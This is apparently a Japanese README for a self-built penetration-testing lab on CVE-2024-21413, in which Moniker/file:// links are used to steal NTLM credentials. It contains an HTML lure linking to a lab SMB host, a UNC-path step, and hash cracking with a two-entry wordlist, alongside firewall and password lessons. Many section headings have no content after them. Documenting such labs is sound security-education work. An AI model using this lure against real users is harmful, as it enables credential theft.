
CVE-2024-21413 moniker link を悪用してNTLM認証情報を窃取するペネトレーションテストラボ。攻撃実行、ハッシュクラッキング、防御策を含む。
CVE-2024-21413 の Moniker Link を利用した NTLM 資格情報窃取のハンズオン侵入テストラボです。このプロジェクトは、セットアップから資格情報の奪取までの完全な攻撃チェーンを、実際の課題と解決策を含めて文書化しています。
主要な成果: 隔離されたラボ環境(Windows 10 VM)と実システム(Windows 11 PC)の両方で Moniker Link 攻撃を成功させ、実用的なセキュリティ脆弱性と防御策を示しました。
攻撃マシン:
標的システム:
ネットワーク構成:
HTML ファイル(test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
エクスプローラーによる方法:
\\192.168.56.101\test と入力問題:
原因:
解決策:
教訓: デフォルトの Windows ファイアウォールはこの攻撃に対して効果的な防御を提供します。ユーザーは有効にしておく必要があります。
問題:
nwigwecj112Honey(間違ったパスワード!)12Honey は以前のテストからのもの原因:
~/.john/john.pot に保存解決策:
1414 に変更教訓: 常に正しいハッシュを解析していることを確認してください。テストの際は pot ファイルを消去するか、ユニークなパスワードを使用してください。
問題:
1414 が rockyou.txt(1400万パスワード)に見つからない原因:
解決策:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
教訓: 「rockyou.txt にないから安全」とは限りません。短いパスワードは、ワードリストの有無にかかわらず、標的型攻撃やブルートフォースに対して脆弱です。
✅ Windows ファイアウォール - 有効時は攻撃を完全にブロック ✅ 最新ブラウザ - Chrome/Edge はリモートの file:// リンクをブロック ✅ ユーザーの認識 - 手動プロンプトではユーザーの操作が必要
❌ 弱いパスワード - 4 桁の数字は簡単に解析された ❌ ファイアウォールの無効化 - ユーザーによくある過ち ❌ エクスプローラー - UNC パスに警告なし ❌ NTLM プロトコル - SMB 共有への自動認証
1. ファイアウォールは極めて重要
2. パスワード強度の錯覚
1414 は rockyou.txt にない(一見「強い」ように見える)3. ユーザーの操作が必要
攻撃用:
インフラストラクチャ:
Moniker-Link-Lab-Setup/
├── README.md(このファイル)
├── Documentation/
│ ├── attack-execution.md(ステップバイステップの攻撃ガイド)
│ └── README.md(ドキュメント概要)
├── Screenshots/(攻撃スクリーンショット - 追加予定)
└── Scripts/(HTML テストファイル - 追加予定)
技術面:
プロフェッショナル面:
すべてのテストは認可されたシステムで実施:
法的注意: 許可のないコンピュータへのアクセスは違法です。このプロジェクトは教育目的および認可されたテスト環境でのみ使用してください。
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a
日付: 2026年3月
教育目的のみ。許可のないテストには使用しないでください。
⭐ このプロジェクトが役立つと思われましたら、リポジトリにスターを付けることをご検討ください!
| 指標 | 結果 |
|---|
| 初期パスワード | nwigwecj1 |
| 変更後 | 1414 |
| ワードリスト | カスタム(2 エントリ) |
| 解析時間 | 1 秒未満 |
| ファイアウォール | テストのため無効 |
| ステータス | ✅ 攻略成功 |
| 指標 | 結果 |
|---|
| パスワード | 1414 |
| ファイアウォール | 最初はブロック、その後無効化 |
| 認証 | 手動プロンプト(資格情報を入力) |
| 解析時間 | 即時 |
| ステータス | ✅ 攻略成功 |